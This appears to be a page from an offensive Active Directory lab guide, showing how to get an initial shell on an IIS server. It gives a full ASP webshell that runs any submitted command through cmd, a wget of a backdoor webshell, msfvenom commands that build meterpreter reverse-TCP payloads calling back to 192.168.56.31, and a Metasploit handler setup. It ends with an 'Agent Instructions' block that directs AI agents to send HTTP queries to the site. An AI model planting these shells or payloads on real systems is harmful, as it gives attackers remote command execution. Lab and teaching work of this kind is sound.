# Initial Shell Shell Shell

```
wget https://github.com/backdoorhub/shell-backdoor-list/blob/master/shell/asp/aspcmd.asp    
        output = "    ?                    this help page\n" +
           "    :sv                  all server variables\n" +
           "    <shell command>      execute any shell command\n";
```

```
<%
Function getResult(theParam)
    Dim objSh, objResult
    Set objSh = CreateObject("WScript.Shell")
    Set objResult = objSh.exec(theParam)
    getResult = objResult.StdOut.ReadAll
end Function
%>
<HTML>
    <BODY>
        Enter command:
            <FORM action="" method="POST">
                <input type="text" name="param" size=45 value="<%= myValue %>">
                <input type="submit" value="Run">
            </FORM>
            <p>
        Result :
        <% 
        myValue = request("param")
        thisDir = getResult("cmd /c" & myValue)
        Response.Write(thisDir)
        %>
        </p>
        <br>
    </BODY>
</HTML>
```

* The webshell is uploaded in the upload folder.
* And we have a command execution on the IIS server

<figure><img src="https://mayfly277.github.io/assets/blog/GOAD/privesc_iss_webshell.png" alt=""><figcaption></figcaption></figure>

*

```
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.31 lport=1234 -f exe > shell.exe

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.31 lport=1234 -f asp > shelldaddy.asp
```

Although you don’t need to rely on the Metepreter shell’s getprivs command. You can check for the enabled privilege can be checked with the help of the whoami command with the /priv option added to it as shown in the image below. We can see that the session that we gained through exploitation is for the user iisapppool.

```
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.56.31
set lport 1234
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://watchdogsacademy.gitbook.io/attacking-active-directory/metasploit/initial-shell-shell-shell.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.